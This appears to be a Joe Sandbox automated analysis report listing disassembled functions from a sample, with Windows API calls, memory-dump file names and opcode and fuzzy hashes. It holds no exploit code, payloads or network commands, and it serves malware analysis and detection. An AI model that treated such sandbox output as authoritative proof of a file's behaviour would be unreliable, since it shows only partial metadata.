Part of subcall function 00007FF71612E948: ReleaseSemaphore.KERNEL32 ref: 00007FF71612E974
Part of subcall function 00007FF71612E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF71612E993
Part of subcall function 00007FF71612E948: DeleteCriticalSection.KERNEL32 ref: 00007FF71612E9AA
Part of subcall function 00007FF71612E948: CloseHandle.KERNEL32 ref: 00007FF71612E9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716131ACB

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1624603282-0
Opcode ID: bf490f98653311f0fa717d6a61b3b21447a9b3ceefdab9f981681a0b66a97f5a
Instruction ID: 7d84b6494530b34b1c03fa9eaea02558089406151df2f16ac5f00d35afe15b17
Opcode Fuzzy Hash: bf490f98653311f0fa717d6a61b3b21447a9b3ceefdab9f981681a0b66a97f5a
Instruction Fuzzy Hash: 5861C172B16E8591FE08EB65E9450BEB365FF40BB1B944132D72E07AD1DF2CE4A89310

Function 00007FF71611EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611EEB8

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 607368e413bc42d48fc483c0537fc0e05792b1f83dee924582f930783f75b2fb
Instruction ID: f0ce14d2a51924bc95f6e9ffcc118aa4ae7ca4ae0b013b456e6346c1fda539fa
Opcode Fuzzy Hash: 607368e413bc42d48fc483c0537fc0e05792b1f83dee924582f930783f75b2fb
Instruction Fuzzy Hash: 7151C7A2A08E4280FE14AB76F8443ABA751FB45BE4F940135DE4D07392DF3DE589D320

Function 00007FF71611E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF716123EC8: FindClose.KERNELBASE(?,?,00000000,00007FF716130811), ref: 00007FF716123EFD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611E993

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: b25a0dcdf97d563b9153ddc70198164d8453106f1b1cd9031932cf08272d4a92
Instruction ID: 867c03485ebc440950b11f0a9ed20278fdadb8f5e55cd5cd94b17126f2489bde
Opcode Fuzzy Hash: b25a0dcdf97d563b9153ddc70198164d8453106f1b1cd9031932cf08272d4a92
Instruction Fuzzy Hash: 6E5186A2A18E8582FB50EF65F84537EA351FF84BA4F840135EA4D076A5DF2CD445E720

Function 00007FF716121794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612187D

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 26cde9ff6a100412955907b86b9e0c80228dcd9fdbec816ea4acd55efa22fafd
Instruction ID: 971e6e25f8a453124d44043a2e293c9e163c34736ffb0348487dae5c1de48d3d
Opcode Fuzzy Hash: 26cde9ff6a100412955907b86b9e0c80228dcd9fdbec816ea4acd55efa22fafd
Instruction Fuzzy Hash: 0E41D662B18E8182FA14EA16B94137AE252FB44BD0F948539EF4C07F9ADF3CD4959340

Function 00007FF716122F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161230C8

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
Instruction ID: a0349fd4fb73d5cc79cae3e07bab30d299cc95bbba7d6abc16c4d2b7854cfd60
Opcode Fuzzy Hash: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
Instruction Fuzzy Hash: 91410462A08F41C0FB10AB25F94537BA362EB44BE4FA41138EA4D47699DF3CE0899624

Function 00007FF71614BDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF71614BE20

Part of subcall function 00007FF71614BFB0: GetModuleHandleExW.KERNEL32 ref: 00007FF71614BFD0
Part of subcall function 00007FF71614BFB0: GetProcAddress.KERNEL32 ref: 00007FF71614BFE6
Part of subcall function 00007FF71614BFB0: FreeLibrary.KERNEL32 ref: 00007FF71614C00B

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction ID: 83ce72d2483c69d220bf034bc258cd310d4be4d4d29decc2953e1ff5e76e7825
Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction Fuzzy Hash: 6141E631A19E5282FB54FB15FC9017AE2A1BF94B60FC14436DA0D17691EF3CE849E760

Function 00007FF71611129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716111396

Part of subcall function 00007FF716111F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF716111F89

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: c531f2d93e59bc2c3255c3b03e21e7a52a1bb814650bbdd6308fec67296c0182
Instruction ID: d93fc736e5019b5a9f752c3d47bdb6264956e534ae6aa58b8530840f144e5c2a
Opcode Fuzzy Hash: c531f2d93e59bc2c3255c3b03e21e7a52a1bb814650bbdd6308fec67296c0182
Instruction Fuzzy Hash: 7E21B562A18B5185FA14AF62B80127AE250FB05BF0FA80B30DE3D47BC5DF7CE056A314

Function 00007FF71615124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF716151280

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction ID: f5c63bba7640aec95f51c2caf66c5529f62e684d7e098ae3c5fb490b0d4978a2
Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction Fuzzy Hash: 9E11723290CB4286F611BB65BC4153BF2B5FB42360FE40534EA4D87799DF2CE808A760

Function 00007FF716113AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716113B6C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
Instruction ID: 24a7a1bf924d8ae18e092c66b95725c2c8b72430d38582c869b58ce9c1f5726e
Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
Instruction Fuzzy Hash: 860188A2E18F8541FA11A728F84526AB361FFC97B4FC09231E69C076E9EF6CD0459714

Function 00007FF716141558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF716141604: GetModuleHandleW.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF71614162B

DloadProtectSection.DELAYIMP ref: 00007FF7161415C9

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
Instruction ID: d3302938bbda06216392f19f0f3f65e9ca0bef913d78612027f1f5cecae1373e
Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
Instruction Fuzzy Hash: BB119A71F18D4641FBA0BB09BC523B29361AF15369F950034DD0E472A1EF2CA89DE720

Function 00007FF71614FA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF71614FA59

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction ID: b0ca38fd560696f2feffe0ca87369929c49339233559ae0ce81ac21cefd28859
Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction Fuzzy Hash: 90F0AF64B09A0349FE547669BD143B692909FC4B60FDC5430C90E873A1FF1CE5896130

Function 00007FF716123EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7161240BC: FindFirstFileW.KERNELBASE ref: 00007FF71612410B
Part of subcall function 00007FF7161240BC: FindFirstFileW.KERNELBASE ref: 00007FF71612415E
Part of subcall function 00007FF7161240BC: GetLastError.KERNEL32 ref: 00007FF7161241AF

FindClose.KERNELBASE(?,?,00000000,00007FF716130811), ref: 00007FF716123EFD

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction ID: 06fd70c17d194589e6d632c8440605125353edb72102c9befc6370e7d8a04115
Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction Fuzzy Hash: 46F0F462908A41C1FB10BF74B80017BB362AB1ABB4F64133CEA3D072C7CE28D4899765

Function 00007FF7161220D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF71612207E), ref: 00007FF7161220F6

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: f33f2f14fe89bf382b7524e3e520a7ffaaaeab558e9ea0dac78ad9979078bb5d
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: 01F0A962A04A4285FB649B30F8417BEA671EB15B78F994339DB3C411D4DF2CD9D9D310

Function 00007FF71614D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF71614D98A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: b73b4e693c452161275fa510f085185fa4641b1cb13667c1c354698e62753273
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: 97F03462E09A4744FF5476B1BC602B692905F847B0FC85A30DD2E873C2EF2DA488A230

Function 00007FF71612273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF716122755

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
